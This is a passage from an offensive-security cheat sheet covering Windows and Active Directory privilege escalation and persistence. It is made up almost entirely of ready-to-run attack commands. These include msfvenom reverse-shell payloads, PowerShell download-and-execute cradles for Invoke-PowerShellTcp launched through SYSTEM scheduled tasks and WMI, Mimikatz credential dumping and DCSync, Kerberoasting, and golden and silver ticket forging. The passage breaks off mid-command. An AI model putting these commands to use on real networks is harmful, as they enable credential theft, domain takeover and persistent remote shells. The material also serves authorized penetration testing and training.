-> Exploitation
```
msfvenom -p windows/x64/shell_reverse_tcp lhost=ip lport=port -f msi -o ok.msi
msiexec /quiet /qn /i C:\Temp\ok.msi
```

### Registry
-> Detection
```
powershell.exe -c "Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl"
\\NT AUTHORITY\INTERACTIVE Allow FullControl
net localgroup administrators
```

-> Exploitation
```
wget https://raw.githubusercontent.com/sagishahar/scripts/master/windows_service.c (edit)
sudo apt install gcc-mingw-w64
x86_64-w64-mingw32-gcc windows_service.c -o ok.exe
```
```
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\ok.exe /f
sc start regsvc
net localgroup administrators
```

### Executable Files
-> Detection
```
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service"
\\RW Everyone
\\ FILE_ALL_ACCESS
net localgroup administrators
```

-> Exploitation
```
wget https://raw.githubusercontent.com/sagishahar/scripts/master/windows_service.c (edit)
sudo apt install gcc-mingw-w64
x86_64-w64-mingw32-gcc windows_service.c -o ok.exe
```
```
copy /yc:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"
sc start filepermsvc
```

### Startup Applications
-> Detection - Windows
```
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" | findstr (F)
\\BUILTIN\Users:(F)
```

-> msfvenom - Attacker VM
```
msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f exe -o ok.exe
```

-> Exploitation - Windows
```
iex (iwr http:///PowerView.ps1 -Outfile ok.exe)
move ok.exe “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”
logoff
```

### Hot Potatle
-> Exploitation
```
net localgroup administrators
powershell.exe -nop -ep bypass
powershell.exe -c "wget https://raw.githubusercontent.com/Kevin-Robertson/Tater/master/Tater.ps1 -O Tater.ps1"
Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1
Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"
net localgroup administrators
```

### DLL Hijacking
-> Exploitation
```
wget https://raw.githubusercontent.com/sagishahar/scripts/master/windows_dll.c (edit)
x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll
move hijackme.dll
sc stop & sc start
```

### Automated Enumeration - Local Privilege Escalation
-> PowerUp
```
. .\PowerUp.ps1
Invoke-AllChecks
```
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1

-> BeRoot
```
. .\beRoot.exe
```
https://github.com/AlessandroZ/BeRoot/releases

-> Privesc
```
. .\privesc.ps1
Invoke-PrivEsc
```
https://raw.githubusercontent.com/enjoiz/Privesc/master/privesc.ps1

-> Winpeas
```
winpeas.exe > outputfile.txt
```
https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS

-> PrivescCheck
```
Set-ExecutionPolicy Bypass -Scope process -Force
. .\PrivescCheck.ps1
Invoke-PrivescCheck
```
https://github.com/itm4n/PrivescCheck

-> Windows Exploit Suggester - Next Generation (WES-NG)
```
systeminfo > systeminfo.txt
```
```
python wes.py systeminfo.txt
```

https://github.com/bitsadmin/wesng

-> Kernel Exploits - meterpreter
```
run post/multi/recon/local_exploit_suggester
```

-> windows-privesc-check2.exe
```
windows-privesc-check2.exe --dump -G
```
https://github.com/pentestmonkey/windows-privesc-check

## Domain Privilege Escalation
### Kerberos Delegation
Delegation in Kerberos is a setting that allows reuse of end user credentials to access resources hosted on a different server.
e.g
Users authenticate to a web server and the web server makes requests to a database server. The web server can request access to resources (specific resources(Constrained Delegation), all resources(Unconstrained Delegation)) on the database server as a user and not as a web server service account.

#### Unconstrained Delegation

Allows the first hop server to request access to any service or computer in the domain.
-> Discover domain computers which have unconstrained delegation enabled
```
Get-NetComputer -Unconstrained (PowerView)
Get-ADComputer -Filter {TrustedForDelegation -eq $True} (AD Module)
Get-ADUser -Filter {TrustedForDelegation -eq $True} (AD Module)
```

-> Verify Local Admin Access, therefore, you need to have a user that has local administrator access on the server.
```
Find-LocalAdminAccess
```
```
$sess = New-PSSession -ComputerName
Invoke-Command -FilePath C:\Tools\Invoke-Mimikatz.ps1 -Session $sess
Enter-PSSession -Session $sess
```

-> Run the following mimikatz command in the new PowerShell session running with the user to check if a domain admin ticket already exists, before Create a new directory to avoid overwriting tickets from other users.
```
mkdir user1
cd user1
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
ls | select name
```

-> If you don't have a domain admin ticket and you have to wait or trick a DA to access a resource on the server, use this trick:
```
Invoke-UserHunter -ComputerName dcorp-appsrv -Poll 100 -UserName Administrator -Delay 5 -Verbose
```

-> export tickets
```
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
ls | select name
```

-> Reuse the ticket by injecting it into lsass to get DA privileges:
```
Invoke-Mimikatz -Command '"kerberos::ptt [0;a925ff][email protected]"'
```

### Constrained Delegation

Allows the first hop server to request access only to specified services on specified computers.
-> Enumerate users and computers with constrained delegation enabled
```
Get-DomainUser -TrustedToAuth (PowerView)
Get-DomainComputer -TrustedToAuth (PowerView)
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
```

-> Exploitation
```
.\kekeo.exe
tgt::ask /user:ok$ /domain:example.okcorp.local /rc4:
tgs::s4u /tgt: /user:Administrator@ /service:CIFS/.
Invoke-Mimikatz -Command '"kerberos::ptt "'
klist
```
or
```
.\Rubeus.exe s4u /user:ok$ /rc4:cc098f204c5887eaa8253e7c2749156f /impersonateuser:Administrator /msdsspn:"CIFS/." /ptt
```
or
```
.\kekeo.exe
tgt::ask /user: /domain:example.okcorp.local /rc4:
tgs::s4u /tgt: /user:Administrator@ /service:|LDAP/
Invoke-Mimikatz -Command '"kerberos::ptt
klist
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
```

### Kerberoast
It is an attack technique where an attacker/user requests a TGS from the KDC for services running on behalf of user accounts in AD, after capturing the TGS from memory, the hash of the offline service account is broken.
-> Discover services running with user accounts
```
Get-NetUser -SPN
```

-> After finding a user with defined SPN, request a ticket for the service.
```
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "/"
klist
```

-> Dumping tickets to disk:
```
Invoke-Mimikatz -Command '"kerberos::list /export"'
```

-> Offline crack service account password
```
python.exe .\tgsrepcrack.py .\10k-worst-pass.txt .\
```

https://raw.githubusercontent.com/OWASP/passfault/master/wordlists/wordlists/10k-worst-passwords.txt
https://raw.githubusercontent.com/nidem/kerberoast/master/tgsrepcrack.py

### AS-REP Roasting
AS-REP Roasting is a technique where the goal is to dump hashes of user accounts that have Kerberos preauthentication disabled (Do not require Kerberos preauthentication property).
Unlike Kerberoasting, these users do not need to be service accounts.

-> Enumerate the users who have Kerberos Preauth disabled. (PowerView)
```
Get-DomainUser -PreauthNotRequired -Verbose
```

-> Request the crackable encrypted part of AS-REP that can be broken
```
Get-ASREPHash -UserName VPNxuser-Verbose`
```

-> Use john or hashcat to break hashes offline
```
hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt
```
```
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
```

### Loading arbitrary DLL
Members of the DNSAdmins group Loading arbitrary DLL with the privileges of dns.exe ( SYSTEM )
In case the DC also serves as DNS this will give us the escalation for the DA.

Need privileges to restart DNS service.
-> Detection (enumerate the members of the DNSAdmins group
```
Get-NetGroupMember -GroupName "DNSAdmins"
Get-ADGroupMember -Identity DNSAdmins
```

-> Configure DLL using dnscmd.exe (needs RSAT DNS):
```
dnscmd dcorp-dc /config /serverlevelplugindll \\\dll\mimilib.dll
sc \\dcorp-dc stop dns
sc \\dcorp-dc start dns
type c:\Windows\System32\kiwidns.log
```

### Trust Abuse - MSSQL Servers
-> Discovery - SPN Scanning
```
Get-SQLInstanceDomain
```

-> Check Accessibility
```
Get-SQLConnectionTestThreaded
```
```
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
```

-> Gather Information
```
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
```

-> Searching Database Links
```
Get-SQLServerLink -Instance srv-mssql -Verbose
```
or in .exe
```
select * from master..sysservers
```

-> Enumerating DatabaseLinks via powerUPSQL
```
Get-SQLServerLinkCrawl -Instance srv-mssql -Verbose
```
or
-> Enumerating DatabaseLinks via Openquery with - Openquery queries can be chained to access links within links(nested links)
```
select * from openquery("srv-sql1",'select * from openquery("srv-mgmt","select * from master..sysservers")')
```

-> Executing Commands
On the target server, either xp_cmdshell should be already enabled or if rpcout is enabled (disabled by default), xp_cmdshell can be enabled using:
```
EXECUTE('sp_configure "xp_cmdshell",1;reconfigure;')AT "eu-sql"
```

```
Get-SQLServerLinkCrawl -Instance srv-mssql -Query "exec master..xp_cmdshell 'whoami'" | ft
```
or
```
select * from openquery("srv-sql1",'select * from openquery("srv-mgmt","select * from openquery("us-sql",""select @@version as version;exec master..xp_cmdshell "powershell whoami)"")")')
```
or
```
Invoke-SQLOSCmd -Verbose -Command "powershell iex(New-Object Net.WebClient).DownloadString(‘http:///Invoke-PowerShellTcp.ps1') -Instance .
```
https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/lateral_movement/Invoke-SQLOSCmd.ps1

### forcechangepassword
```
Set-ADAccountPassword -Identity -NewPassword (ConvertTo-SecureString -AsPlainText "okay@12345" -Force)
```

## Escalating privileges across domains
There is an implicit two-way trust of domains with other domains in the same forest
There are two ways of escalating privileges between domains in the same forest:
– Trust tickets
– Krbtgthash

### Mimikatz - Mix
```
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "vault::cred /patch" "exit"'
```
### Mimikatz - Get Clear-Text Passwords of scheduled tasks
```
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "vault::cred /patch"'
```

### Using the domain trust key - Child to parent using Trust Tickets
-> get rc4 trust key
```
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc
```
or
```
Invoke-Mimikatz-Command'"lsadump::dcsync/user:dcorp\mcorp$"'
```
-> get SID current domain
```
Get-DomainSID (PowerView)
```

-> get SID of the enterprise admins group of the parent domain
```
Get-DomainGroup -Identity "Enterprise Admins" -Domain
```

-> Exploiting
```
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain: /service:krbtgt /rc4: /sid: /sids: /target: /ticket:C:\Tools\kekeo_old\trust_tkt.kirbi"'
```

```
.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/ok-dc.
.\kirbikator.exe lsa .\CIFS.ok-dc..kirbi
```
or
```
.\Rubeus.exe asktgs /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi /service:cifs/ok-dc. /dc:ok-dc. /ptt
```
```
klist
```

### Using hash krbtgt - Child to parent using krbtgt hash
-> get hash krbtgt
```
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
```

-> get SID current domain
```
Get-DomainSID (PowerView)
```

-> get SID of the enterprise admins group of the parent domain
```
Get-DomainGroup -Identity "Enterprise Admins" -Domain
```
```
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:ok.example.local /krbtgt: /sid: /sids:-519 /ticket:C:\Tools\kekeo_old\krbtgt_tkt.kirbi"'
Invoke-Mimikatz -Command '"kerberos::ptt C:\Tools\krbtgt_tkt.kirbi"'
```

-> Schedule a task and run it as SYSTEM
```
schtasks /create /S dev.dc.example.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheckx" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://ip/Invoke-PowerShellTcp.ps1''')'"
schtasks /Run /S dev-dc.example.local /TN "STCheckx"
```
```
powercat -l -v -p 443 -t 1000
```

## Across Forest using Trust Tickets
```
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc
```
or
```
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dcorp-dc
```

-> get SID current domain
```
Get-DomainSID (PowerView)
```
```
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain: /service:krbtgt /rc4:28167df917b795605413be3e5aa59426 /sid:S-1-5-21-1874506631-3219952063-538504511 /target: /ticket:C:\Tools\kekeo_old\d2_trust_tkt.kirbi"'
```
```
.\asktgs.exe C:\Tools\kekeo_old\d2_trust_tkt.kirbi CIFS/
.\kirbikator.exe lsa.\CIFS/
```
or
```
.\Rubeus.exe asktgs /ticket:C:\Tools\kekeo_old\trust_forest_tkt.kirbi /service:cifs/ /dc: /ptt
```

## Persistence
### Golden Ticket
It is a persistence and elevation of privilege technique where tickets are forged to take control of the Active Directory Key Distribution Service (KRBTGT) account and issue TGT's.

-> Get krbtgt NTHash
-> lsa
```
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
```
or
-> DCSync Attack that allows an adversary to simulate the behavior of a domain controller (DC) and retrieve password data via domain replication.
```
Invoke-Mimikatz -Command '"lsadump::dcsync /user:\krbtgt'"
```

-> get SID
```
Get-Domainsid (PowerView)
```

-> Exploitation
```
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /doimain: /sid: /krbtgt: /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
```
or
```
load kiwi
golden_ticket_create -k krbtgt_nthash -d -i -s -u Administrator -t /tmp/golden.tck
kerberos_ticket_use /tmp/gold.tck
kerberos_ticket_list
wmic /node:dc computersystem get name,username,domain
```

```
wmic /node:dc process call create "powershell -nop -exec bypass iex(new-object net.webclient).downloadstring('http:///rev.ps1')"
```

### Silver Ticket
It is a persistence and elevation of privilege technique in which a TGS is forged to gain access to a service in an application.
-> Get Domain SID
```
GetDomainsid (PowerView)
```

-> Get Machine Account Hash - RID 1000
```
Invoke-Mimikatz '"lsadump::lsa /patch"' -ComputerName
```

-> Exploitation - Creating a Silver Ticket that gives us access to the DC HOST service.
```
Invoke-Mimikatz -Command '"kerberos::golden /domain: /sid: /target:. /service:HOST /rc4: /user:Administrator /ptt"'
```

-> Creating and executing task
```
schtasks /create /S . /SC Weekly /RU "NT Authority\SYSTEM" /TN "UserX" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://ip/Invoke-PowerShellTcp.ps1''')'"
```
```
schtasks /Run /S . /TN "UserX"
```
```
powercat -l -p 443 -v -t 1024
```

-> Creating a Silver Ticket that gives us access to the DC HOST service.
```
Invoke-Mimikatz -Command '"kerberos::golden /domain: /sid: /target:. /service:HOST /rc4: /user:Administrator /ptt"'
```

-> Creating a Silver Ticket that gives us access to the DC RPCSS service.
```
Invoke-Mimikatz -Command '"kerberos::golden /domain:/sid: /target:.